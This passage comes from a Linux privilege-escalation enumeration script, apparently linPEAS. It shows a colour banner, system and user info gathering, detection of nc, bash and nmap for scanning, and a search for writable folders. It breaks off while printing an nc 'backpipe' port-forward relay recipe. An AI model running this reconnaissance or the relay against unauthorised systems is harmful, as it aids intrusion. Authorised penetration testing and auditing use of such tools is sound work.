\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;70;207;36m\e[38;2;67;196;36m▄\e[48;2;52;110;38m \e[48;2;57;101;47m\e[38;2;56;90;47m▄\e[48;2;36;55;31m\e[38;2;38;58;33m▄\e[0m 308 \e[48;2;40;63;35m\e[38;2;43;67;38m▄\e[48;2;61;117;48m\e[38;2;45;80;38m▄\e[48;2;54;114;39m\e[38;2;52;110;38m▄\e[48;2;64;177;36m\e[38;2;59;150;37m▄\e[48;2;72;217;36m\e[38;2;72;214;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;36m\e[38;2;73;218;37m▄\e[48;2;61;182;30m\e[38;2;73;218;37m▄\e[48;2;45;135;22m\e[38;2;73;218;37m▄\e[48;2;58;174;29m\e[38;2;73;218;37m▄\e[48;2;72;217;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;71;212;35m\e[38;2;72;216;36m▄\e[48;2;34;101;17m\e[38;2;11;32;5m▄\e[48;2;34;101;17m\e[38;2;1;2;1m▄\e[48;2;34;98;18m\e[38;2;1;3;1m▄\e[48;2;35;101;18m\e[38;2;1;1;1m▄\e[48;2;35;100;17m\e[38;2;1;3;1m▄\e[48;2;57;170;29m\e[38;2;56;168;28m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;36m\e[38;2;72;218;36m▄\e[48;2;66;197;33m\e[38;2;72;217;36m▄\e[48;2;46;139;23m\e[38;2;73;217;37m▄\e[48;2;54;163;27m\e[38;2;72;217;37m▄\e[48;2;71;212;36m\e[38;2;72;217;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;37m\e[38;2;70;204;36m▄\e[48;2;60;158;37m\e[38;2;53;122;37m▄\e[48;2;52;103;38m\e[38;2;52;104;40m▄\e[48;2;33;54;28m\e[38;2;21;34;18m▄\e[48;2;46;70;41m\e[38;2;49;76;44m▄\e[0m 309 \e[48;2;49;76;44m\e[38;2;51;78;45m▄\e[48;2;32;51;28m\e[38;2;43;65;37m▄\e[48;2;61;125;45m\e[38;2;81;124;71m▄\e[48;2;54;124;38m\e[38;2;53;113;40m▄\e[48;2;68;202;36m\e[38;2;60;156;37m▄\e[48;2;73;218;37m\e[38;2;72;215;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;73;216;37m▄\e[48;2;73;217;37m\e[38;2;93;205;61m▄\e[48;2;79;213;44m\e[38;2;121;189;95m▄\e[48;2;85;210;51m\e[38;2;132;184;108m▄\e[48;2;82;211;47m\e[38;2;121;191;93m▄\e[48;2;73;217;37m\e[38;2;85;210;52m▄\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;37;111;20m\e[38;2;71;214;36m▄\e[48;2;1;2;0m\e[38;2;44;128;22m▄\e[48;2;2;4;2m\e[38;2;15;39;8m▄\e[48;2;1;1;1m\e[38;2;29;82;14m▄\e[48;2;13;37;7m\e[38;2;68;204;34m▄\e[48;2;70;210;35m\e[38;2;73;218;37m▄\e[48;2;73;217;37m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;217;37m\e[38;2;74;216;38m▄\e[48;2;82;211;47m\e[38;2;118;191;90m▄\e[48;2;100;200;70m\e[38;2;132;185;108m▄\e[48;2;103;201;72m\e[38;2;127;187;101m▄\e[48;2;98;203;67m\e[38;2;125;189;100m▄\e[48;2;85;209;52m\e[38;2;116;192;88m▄\e[48;2;73;217;37m\e[38;2;80;211;44m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;36m\e[38;2;68;200;35m▄\e[48;2;63;170;35m\e[38;2;54;125;36m▄\e[48;2;51;103;38m\e[38;2;51;99;38m▄\e[48;2;49;101;36m\e[38;2;22;45;17m▄\e[48;2;30;47;26m\e[38;2;45;69;39m▄\e[48;2;51;78;45m \e[0m 310 \e[48;2;51;78;45m \e[48;2;49;75;43m\e[38;2;51;78;45m▄\e[48;2;30;38;27m\e[38;2;39;59;35m▄\e[48;2;63;123;49m\e[38;2;71;110;62m▄\e[48;2;54;121;37m\e[38;2;56;119;40m▄\e[48;2;68;198;37m\e[38;2;60;158;37m▄\e[48;2;73;218;37m\e[38;2;71;216;36m▄\e[48;2;73;217;37m\e[38;2;73;216;38m▄\e[48;2;91;206;58m\e[38;2;110;196;81m▄\e[48;2;122;191;95m\e[38;2;126;188;100m▄\e[48;2;128;186;102m\e[38;2;130;187;104m▄\e[48;2;140;180;116m\e[38;2;128;187;103m▄\e[48;2;126;188;100m\e[38;2;106;197;76m▄\e[48;2;96;202;64m\e[38;2;75;215;39m▄\e[48;2;73;217;37m\e[38;2;72;218;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;74;220;37m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;74;217;38m\e[38;2;73;217;37m▄\e[48;2;114;194;86m\e[38;2;76;215;40m▄\e[48;2;142;178;121m\e[38;2;94;205;62m▄\e[48;2;150;176;129m\e[38;2;109;196;81m▄\e[48;2;142;180;120m\e[38;2;95;203;63m▄\e[48;2;116;193;88m\e[38;2;76;214;41m▄\e[48;2;78;213;44m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;67;196;36m▄\e[48;2;71;209;37m\e[38;2;60;154;36m▄\e[48;2;59;152;36m\e[38;2;57;138;37m▄\e[48;2;52;110;38m\e[38;2;56;130;37m▄\e[48;2;51;104;38m\e[38;2;30;71;21m▄\e[48;2;20;31;17m\e[38;2;45;69;39m▄\e[48;2;50;78;44m\e[38;2;51;78;45m▄\e[48;2;51;78;45m \e[0m 311 \e[48;2;51;78;45m\e[38;2;28;43;24m▄\e[48;2;51;78;45m\e[38;2;43;64;38m▄\e[48;2;51;78;45m\e[38;2;52;79;46m▄\e[48;2;34;53;30m\e[38;2;46;71;41m▄\e[48;2;64;124;48m\e[38;2;49;106;36m▄\e[48;2;53;115;38m\e[38;2;57;124;40m▄\e[48;2;63;175;36m\e[38;2;55;126;38m▄\e[48;2;73;217;37m\e[38;2;66;186;36m▄\e[48;2;89;208;56m\e[38;2;73;217;37m▄\e[48;2;111;195;82m\e[38;2;75;215;40m▄\e[48;2;109;197;80m\e[38;2;74;216;38m▄\e[48;2;85;209;52m\e[38;2;73;218;36m▄\e[48;2;73;216;37m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;217;37m\e[38;2;73;218;37m▄\e[48;2;73;217;37m\e[38;2;73;218;37m▄\e[48;2;73;217;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m\e[38;2;71;214;36m▄\e[48;2;71;212;36m\e[38;2;63;172;36m▄\e[48;2;63;174;35m\e[38;2;57;138;37m▄\e[48;2;58;146;36m\e[38;2;57;137;38m▄\e[48;2;58;139;37m\e[38;2;57;138;37m▄\e[48;2;58;138;37m\e[38;2;54;128;35m▄\e[48;2;50;117;34m\e[38;2;20;44;14m▄\e[48;2;20;32;17m\e[38;2;39;61;34m▄\e[48;2;51;77;44m\e[38;2;45;69;40m▄\e[48;2;51;78;45m\e[38;2;45;69;40m▄\e[48;2;51;78;45m\e[38;2;49;75;43m▄\e[0m 312 \e[48;2;84;151;67m\e[38;2;98;177;78m▄\e[48;2;43;80;34m\e[38;2;98;177;78m▄\e[48;2;22;39;19m\e[38;2;98;178;78m▄\e[48;2;43;67;38m\e[38;2;81;148;64m▄\e[48;2;40;70;33m\e[38;2;44;78;36m▄\e[48;2;54;127;36m\e[38;2;21;47;15m▄\e[48;2;55;120;39m\e[38;2;54;117;39m▄\e[48;2;56;133;37m\e[38;2;59;133;40m▄\e[48;2;71;211;36m\e[38;2;61;164;37m▄\e[48;2;73;217;36m\e[38;2;71;211;36m▄\e[48;2;73;218;37m\e[38;2;72;218;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;72;217;36m▄\e[48;2;73;218;37m\e[38;2;67;203;34m▄\e[48;2;68;194;37m\e[38;2;40;116;21m▄\e[48;2;58;142;36m\e[38;2;8;21;5m▄\e[48;2;49;120;31m\e[38;2;6;10;5m▄\e[48;2;25;59;16m\e[38;2;73;108;65m▄\e[48;2;15;33;11m\e[38;2;95;157;79m▄\e[48;2;12;25;9m\e[38;2;97;175;77m▄\e[48;2;21;32;19m\e[38;2;99;179;79m▄\e[48;2;23;35;19m\e[38;2;98;178;78m▄\e[48;2;20;34;17m\e[38;2;98;178;78m▄\e[48;2;13;24;11m\e[38;2;98;178;78m▄\e[48;2;16;26;14m\e[38;2;98;177;78m▄\e[0m 313 \e[48;2;97;176;77m\e[38;2;58;103;46m▄\e[48;2;98;177;78m\e[38;2;94;170;75m▄\e[48;2;98;177;78m\e[38;2;99;179;79m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;97;176;77m\e[38;2;98;177;78m▄\e[48;2;91;165;72m\e[38;2;98;177;78m▄\e[48;2;55;100;44m\e[38;2;98;177;78m▄\e[48;2;15;27;10m\e[38;2;92;168;73m▄\e[48;2;24;46;18m\e[38;2;76;138;61m▄\e[48;2;73;154;53m\e[38;2;54;96;43m▄\e[48;2;74;213;39m\e[38;2;24;48;18m▄\e[48;2;74;222;37m\e[38;2;20;55;11m▄\e[48;2;73;217;37m\e[38;2;31;91;16m▄\e[48;2;73;218;37m\e[38;2;49;145;24m▄\e[48;2;73;218;37m\e[38;2;68;201;35m▄\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m\e[38;2;74;220;37m▄\e[48;2;73;218;37m\e[38;2;73;219;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;73;220;37m▄\e[48;2;73;218;37m\e[38;2;72;214;37m▄\e[48;2;73;218;37m\e[38;2;63;187;32m▄\e[48;2;72;217;36m\e[38;2;41;120;22m▄\e[48;2;74;222;36m\e[38;2;21;52;13m▄\e[48;2;67;203;34m\e[38;2;39;62;34m▄\e[48;2;40;117;21m\e[38;2;64;103;54m▄\e[48;2;14;43;7m\e[38;2;72;126;57m▄\e[48;2;4;12;2m\e[38;2;87;156;69m▄\e[48;2;25;45;21m\e[38;2;97;174;78m▄\e[48;2;71;124;57m\e[38;2;99;177;80m▄\e[48;2;97;168;78m\e[38;2;94;170;75m▄\e[48;2;96;175;77m\e[38;2;103;177;84m▄\e[48;2;98;176;79m\e[38;2;109;183;90m▄\e[48;2;100;178;80m\e[38;2;112;185;94m▄\e[48;2;100;177;80m\e[38;2;111;184;92m▄\e[48;2;99;177;80m\e[38;2;107;182;89m▄\e[48;2;98;177;78m\e[38;2;105;182;85m▄\e[48;2;98;177;78m\e[38;2;103;180;83m▄\e[48;2;98;177;78m\e[38;2;99;177;79m▄\e[0m 314 \e[38;2;54;79;47m▀\e[38;2;72;123;60m▀\e[48;2;97;176;78m\e[38;2;65;87;60m▄\e[48;2;98;177;78m\e[38;2;73;130;59m▄\e[48;2;98;177;78m\e[38;2;91;165;72m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;96;172;77m\e[38;2;98;177;78m▄\e[48;2;82;147;65m\e[38;2;98;177;78m▄\e[48;2;66;116;52m\e[38;2;98;177;78m▄\e[48;2;46;78;38m\e[38;2;98;177;78m▄\e[48;2;27;51;20m\e[38;2;98;177;78m▄\e[48;2;28;60;20m\e[38;2;94;169;74m▄\e[48;2;28;67;19m\e[38;2;86;155;69m▄\e[48;2;34;96;19m\e[38;2;69;123;54m▄\e[48;2;42;126;21m\e[38;2;48;86;39m▄\e[48;2;51;148;27m\e[38;2;36;64;28m▄\e[48;2;55;164;28m\e[38;2;26;46;20m▄\e[48;2;60;180;30m\e[38;2;23;39;18m▄\e[48;2;62;186;31m\e[38;2;21;40;17m▄\e[48;2;61;181;31m\e[38;2;19;36;16m▄\e[48;2;67;176;40m\e[38;2;18;32;14m▄\e[48;2;63;173;35m\e[38;2;23;36;19m▄\e[48;2;56;168;29m\e[38;2;27;42;23m▄\e[48;2;53;160;27m\e[38;2;29;45;24m▄\e[48;2;44;133;22m\e[38;2;30;53;25m▄\e[48;2;34;102;17m\e[38;2;52;89;43m▄\e[48;2;20;60;10m\e[38;2;88;148;71m▄\e[48;2;24;47;19m\e[38;2;97;171;78m▄\e[48;2;34;62;27m\e[38;2;98;177;78m▄\e[48;2;55;99;44m\e[38;2;98;177;78m▄\e[48;2;80;144;64m\e[38;2;98;177;78m▄\e[48;2;99;176;79m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;99;177;79m▄\e[48;2;99;177;79m\e[38;2;96;172;76m▄\e[48;2;99;175;79m\e[38;2;85;151;68m▄\e[48;2;95;169;76m\e[38;2;72;121;60m▄\e[48;2;109;180;92m\e[38;2;37;57;32m▄\e[48;2;100;159;85m\e[38;2;38;41;36m▄\e[48;2;72;107;62m\e[38;2;74;74;74m▄\e[0m\e[38;2;44;65;38m▀\e[38;2;31;48;27m▀\e[38;2;31;48;26m▀\e[38;2;31;52;25m▀\e[38;2;41;71;34m▀\e[38;2;59;97;50m▀\e[0m 315 \e[38;2;95;106;94m▀\e[38;2;81;137;65m▀\e[38;2;91;166;73m▀\e[48;2;95;174;76m\e[38;2;61;73;59m▄\e[48;2;98;177;78m\e[38;2;33;66;26m▄\e[48;2;98;177;78m\e[38;2;81;143;65m▄\e[48;2;98;177;78m\e[38;2;102;182;81m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;99;179;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;98;179;78m\e[38;2;98;177;78m▄\e[48;2;97;177;77m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m\e[38;2;99;179;78m▄\e[48;2;98;177;78m\e[38;2;93;169;74m▄\e[48;2;98;177;78m\e[38;2;56;106;44m▄\e[48;2;96;174;77m\e[38;2;16;31;13m▄\e[48;2;68;126;54m\e[38;2;58;58;58m▄\e[0m\e[38;2;28;50;23m▀\e[38;2;20;22;20m▀\e[0m 316 \e[38;2;41;52;39m▀\e[38;2;39;76;30m▀\e[38;2;73;136;57m▀\e[48;2;90;162;72m\e[38;2;96;100;95m▄\e[48;2;99;175;79m\e[38;2;60;69;58m▄\e[48;2;98;177;78m\e[38;2;46;59;43m▄\e[48;2;98;177;78m\e[38;2;32;51;27m▄\e[48;2;98;178;78m\e[38;2;28;50;23m▄\e[48;2;98;178;78m\e[38;2;28;55;22m▄\e[48;2;98;178;78m\e[38;2;35;64;28m▄\e[48;2;98;177;78m\e[38;2;41;75;33m▄\e[48;2;98;177;78m\e[38;2;50;89;41m▄\e[48;2;98;177;77m\e[38;2;54;89;45m▄\e[48;2;98;177;77m\e[38;2;53;89;44m▄\e[48;2;98;177;78m\e[38;2;49;86;39m▄\e[48;2;98;177;78m\e[38;2;45;83;36m▄\e[48;2;98;177;78m\e[38;2;40;74;32m▄\e[48;2;98;177;78m\e[38;2;35;64;28m▄\e[48;2;98;178;78m\e[38;2;39;60;33m▄\e[48;2;90;163;71m\e[38;2;55;61;53m▄\e[0m\e[38;2;53;97;41m▀\e[38;2;24;44;19m▀\e[38;2;36;41;35m▀\e[0m 317 '"; 318 else 319 echo " \e[48;5;108m \e[48;5;59m \e[48;5;71m \e[48;5;77m \e[48;5;22m \e[48;5;108m \e[48;5;114m \e[48;5;59m \e[49m 320 \e[48;5;108m \e[48;5;71m \e[48;5;22m \e[48;5;113m \e[48;5;71m \e[48;5;94m \e[48;5;214m \e[48;5;58m \e[48;5;214m \e[48;5;100m \e[48;5;71m \e[48;5;16m \e[48;5;108m \e[49m 321 \e[48;5;65m \e[48;5;16m \e[48;5;22m \e[48;5;214m \e[48;5;16m \e[48;5;214m \e[48;5;65m \e[49m 322 \e[48;5;65m \e[48;5;214m \e[48;5;16m \e[48;5;214m \e[48;5;16m \e[48;5;214m \e[48;5;136m \e[48;5;65m \e[49m 323 \e[48;5;23m \e[48;5;214m \e[48;5;178m \e[48;5;214m \e[48;5;65m \e[49m 324 \e[48;5;16m \e[48;5;214m \e[48;5;136m \e[48;5;94m \e[48;5;136m \e[48;5;214m \e[48;5;65m \e[49m 325 \e[48;5;58m \e[48;5;214m \e[48;5;172m \e[48;5;64m \e[48;5;77m \e[48;5;71m \e[48;5;65m \e[49m 326 \e[48;5;16m \e[48;5;71m \e[48;5;77m \e[48;5;71m \e[48;5;77m \e[48;5;71m \e[48;5;77m \e[48;5;65m \e[49m 327 \e[48;5;59m \e[48;5;71m \e[48;5;77m \e[48;5;77m \e[48;5;16m \e[48;5;77m \e[48;5;16m \e[48;5;77m \e[48;5;65m \e[49m 328 \e[48;5;65m \e[48;5;77m \e[48;5;71m \e[48;5;16m \e[48;5;77m \e[48;5;113m \e[48;5;77m \e[48;5;65m \e[49m 329 \e[48;5;65m \e[48;5;16m \e[48;5;77m \e[48;5;150m \e[48;5;113m \e[48;5;77m \e[48;5;150m \e[48;5;113m \e[48;5;77m \e[48;5;65m \e[48;5;59m \e[48;5;65m \e[49m 330 \e[48;5;16m \e[48;5;65m \e[48;5;71m \e[48;5;77m \e[48;5;71m \e[48;5;22m \e[48;5;65m \e[49m 331 \e[48;5;108m \e[48;5;107m \e[48;5;59m \e[48;5;77m \e[48;5;16m \e[48;5;114m \e[48;5;108m \e[49m" 332 fi 333 fi 334 } 335 print_support () { 336 printf """ 337 ${GREEN}/---------------------------------------------------------------------------------\\ 338 | ${BLUE}Do you like PEASS?${GREEN} | 339 |---------------------------------------------------------------------------------| 340 | ${YELLOW}Linux PE & Hardening${GREEN} : ${RED}https://hacktricks-training.com/courses/lhe/${GREEN} | 341 | ${YELLOW}Learn Cloud Hacking${GREEN} : ${RED}https://training.hacktricks.xyz ${GREEN} | 342 | ${YELLOW}Follow on Twitter${GREEN} : ${RED}@hacktricks_live${GREEN} | 343 | ${YELLOW}Respect on HTB${GREEN} : ${RED}SirBroccoli ${GREEN} | 344 |---------------------------------------------------------------------------------| 345 | ${BLUE}Thank you! ${GREEN} | 346 \---------------------------------------------------------------------------------/ 347 """ 348 } 349 ########################################### 350 #-----------) Starting Output (-----------# 351 ########################################### 352 echo "" 353 if [ ! "$QUIET" ]; then print_banner; print_support; fi 354 printf ${BLUE}" $SCRIPTNAME-$VERSION ${YELLOW}by carlospolop\n"$NC; 355 echo "" 356 printf ${YELLOW}"ADVISORY: ${BLUE}$ADVISORY\n$NC" 357 echo "" 358 printf ${BLUE}"Linux Privesc Checklist: ${YELLOW}https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html\n"$NC 359 printf ${BLUE}"Best Linux PE & Hardening course: ${YELLOW}https://hacktricks-training.com/courses/lhe/\n"$NC 360 echo " LEGEND:" | sed "s,LEGEND,${C}[1;4m&${C}[0m," 361 echo " RED/YELLOW: 95% a PE vector" | sed "s,RED/YELLOW,${SED_RED_YELLOW}," 362 echo " RED: You should take a look into it" | sed "s,RED,${SED_RED}," 363 echo " LightCyan: Users with console" | sed "s,LightCyan,${SED_LIGHT_CYAN}," 364 echo " Blue: Users without console & mounted devs" | sed "s,Blue,${SED_BLUE}," 365 echo " Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) " | sed "s,Green,${SED_GREEN}," 366 echo " LightMagenta: Your username" | sed "s,LightMagenta,${SED_LIGHT_MAGENTA}," 367 if [ "$IAMROOT" ]; then 368 echo "" 369 echo " YOU ARE ALREADY ROOT!!! (it could take longer to complete execution)" | sed "s,YOU ARE ALREADY ROOT!!!,${SED_RED_YELLOW}," 370 sleep 3 371 fi 372 echo "" 373 printf " ${DG}Starting $SCRIPTNAME. Caching Writable Folders...$NC" 374 echo "" 375 ########################################### 376 #-----------) Some Basic Info (-----------# 377 ########################################### 378 print_title "Basic information" 379 printf $LG"OS: "$NC 380 (cat /proc/version || uname -a ) 2>/dev/null 381 printf $LG"User & Groups: "$NC 382 (id || (whoami && groups)) 2>/dev/null 383 printf $LG"Hostname: "$NC 384 hostname 2>/dev/null 385 echo "" 386 if ! [ "$FAST" ] && ! [ "$AUTO_NETWORK_SCAN" ]; then 387 printf $LG"Remember that you can use the '-t' option to call the Internet connectivity checks and automatic network recon!\n"$NC; 388 fi 389 FPING=$(command -v fping 2>/dev/null || echo -n '') 390 PING=$(command -v ping 2>/dev/null || echo -n '') 391 DISCOVER_BAN_BAD="No network discovery capabilities (fping or ping not found)" 392 if [ "$FPING" ]; then 393 DISCOVER_BAN_GOOD="$GREEN$FPING${BLUE} is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)" 394 else 395 if [ "$PING" ]; then 396 DISCOVER_BAN_GOOD="$GREEN$PING${BLUE} is available for network discovery$LG ($SCRIPTNAME can discover hosts, learn more with -h)" 397 fi 398 fi 399 if [ "$DISCOVER_BAN_GOOD" ]; then 400 printf $YELLOW"[+] $DISCOVER_BAN_GOOD\n$NC" 401 else 402 printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" 403 fi 404 if [ "$(command -v bash || echo -n '')" ] && ! [ -L "$(command -v bash || echo -n '')" ]; then 405 FOUND_BASH=$(command -v bash || echo -n ''); 406 elif [ -f "/bin/bash" ] && ! [ -L "/bin/bash" ]; then 407 FOUND_BASH="/bin/bash"; 408 fi 409 FOUND_NC=$(command -v nc 2>/dev/null || echo -n '') 410 if [ -z "$FOUND_NC" ]; then 411 FOUND_NC=$(command -v netcat 2>/dev/null || echo -n ''); 412 fi 413 if [ -z "$FOUND_NC" ]; then 414 FOUND_NC=$(command -v ncat 2>/dev/null || echo -n ''); 415 fi 416 if [ -z "$FOUND_NC" ]; then 417 FOUND_NC=$(command -v nc.traditional 2>/dev/null || echo -n ''); 418 fi 419 if [ -z "$FOUND_NC" ]; then 420 FOUND_NC=$(command -v nc.openbsd 2>/dev/null || echo -n ''); 421 fi 422 SCAN_BAN_BAD="No port scan capabilities (nc and bash not found)" 423 if [ "$FOUND_BASH" ]; then 424 SCAN_BAN_GOOD="$YELLOW[+] $GREEN$FOUND_BASH${BLUE} is available for network discovery, port scanning and port forwarding$LG ($SCRIPTNAME can discover hosts, scan ports, and forward ports. Learn more with -h)\n" 425 fi 426 if [ "$FOUND_NC" ]; then 427 SCAN_BAN_GOOD="$SCAN_BAN_GOOD$YELLOW[+] $GREEN$FOUND_NC${BLUE} is available for network discovery & port scanning$LG ($SCRIPTNAME can discover hosts and scan ports, learn more with -h)\n" 428 fi 429 if [ "$SCAN_BAN_GOOD" ]; then 430 printf "$SCAN_BAN_GOOD$NC" 431 else 432 printf $RED"[-] $SCAN_BAN_BAD$NC" 433 fi 434 if [ "$(command -v nmap 2>/dev/null || echo -n '')" ];then 435 NMAP_GOOD=$GREEN"nmap${BLUE} is available for network discovery & port scanning, you should use it yourself" 436 printf $YELLOW"[+] $NMAP_GOOD\n$NC" 437 fi 438 echo "" 439 echo "" 440 if [ "$PORTS" ] || [ "$DISCOVERY" ] || [ "$IP" ] || [ "$AUTO_NETWORK_SCAN" ]; then MAXPATH_FIND_W="1"; fi #If Network reduce the time on this 441 if ! [ "$USER" ]; then 442 USER=$(whoami 2>/dev/null || echo -n "UserUnknown") 443 fi 444 for grp in $(groups $USER 2>/dev/null | cut -d ":" -f2); do 445 wgroups="$wgroups -group $grp -or " 446 done 447 wgroups="$(echo $wgroups | sed -e 's/ -or$//')" 448 if [ ! "$HOME" ]; then 449 if [ -d "/Users/$USER" ]; then HOME="/Users/$USER"; #Mac home 450 else HOME="/home/$USER"; 451 fi 452 fi 453 SEDOVERFLOW=true 454 while $SEDOVERFLOW; do 455 #WF=`find /dev /srv /proc /home /media /sys /lost+found /run /etc /root /var /tmp /mnt /boot /opt -type d -maxdepth $MAXPATH_FIND_W -writable -or -user $USER 2>/dev/null | sort` 456 #if [ "$MACPEAS" ]; then 457 WF=$(find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | sort) #OpenBSD find command doesn't have "-writable" option 458 #else 459 # WF=`find / -maxdepth $MAXPATH_FIND_W -type d ! -path "/proc/*" -and '(' -writable -or -user $USER ')' 2>/dev/null | sort` 460 #fi 461 Wfolders=$(printf "%s" "$WF" | tr '\n' '|')"|[a-zA-Z]+[a-zA-Z0-9]* +\*" 462 Wfolder="$(printf "%s" "$WF" | grep "/shm" | head -n1)" # Try to get /dev/shm 463 if ! [ "$Wfolder" ]; then 464 Wfolder="$(printf "%s" "$WF" | grep "tmp\|shm\|home\|Users\|root\|etc\|var\|opt\|bin\|lib\|mnt\|private\|Applications" | head -n1)" 465 fi 466 printf "test\ntest\ntest\ntest"| sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" >/dev/null 2>&1 467 if [ $? -eq 0 ]; then 468 SEDOVERFLOW=false 469 else 470 MAXPATH_FIND_W=$(($MAXPATH_FIND_W-1)) #If overflow of directories, check again with MAXPATH_FIND_W - 1 471 fi 472 if [ $MAXPATH_FIND_W -lt 1 ] ; then # prevent infinite loop 473 SEDOVERFLOW=false 474 fi 475 done 476 #Get HOMESEARCH 477 if [ "$SEARCH_IN_FOLDER" ]; then 478 HOMESEARCH="${ROOT_FOLDER}home/ ${ROOT_FOLDER}Users/ ${ROOT_FOLDER}root/ ${ROOT_FOLDER}var/www/" 479 else 480 HOMESEARCH="/home/ /Users/ /root/ /var/www $(cat /etc/passwd 2>/dev/null | grep "sh$" | cut -d ":" -f 6 | grep -Ev "^/root|^/home|^/Users|^/var/www" | tr "\n" " ")" 481 if ! echo "$HOMESEARCH" | grep -q "$HOME" && ! echo "$HOMESEARCH" | grep -qE "^/root|^/home|^/Users|^/var/www"; then #If not listed and not in /home, /Users/, /root, or /var/www add current home folder 482 HOMESEARCH="$HOME $HOMESEARCH" 483 fi 484 fi 485 GREPHOMESEARCH=$(echo "$HOMESEARCH" | sed 's/ *$//g' | tr " " "|") #Remove ending spaces before putting "|" 486 487 basic_net_info(){ 488 print_title "Basic Network Info" 489 (ifconfig || ip a) 2>/dev/null 490 echo "" 491 } 492 port_forward (){ 493 LOCAL_IP=$1 494 LOCAL_PORT=$2 495 REMOTE_IP=$3 496 REMOTE_PORT=$4 497 echo "In your machine execute:" 498 echo "cd /tmp; rm backpipe; mknod backpipe p;" 499 echo "nc -lvnp $LOCAL_PORT 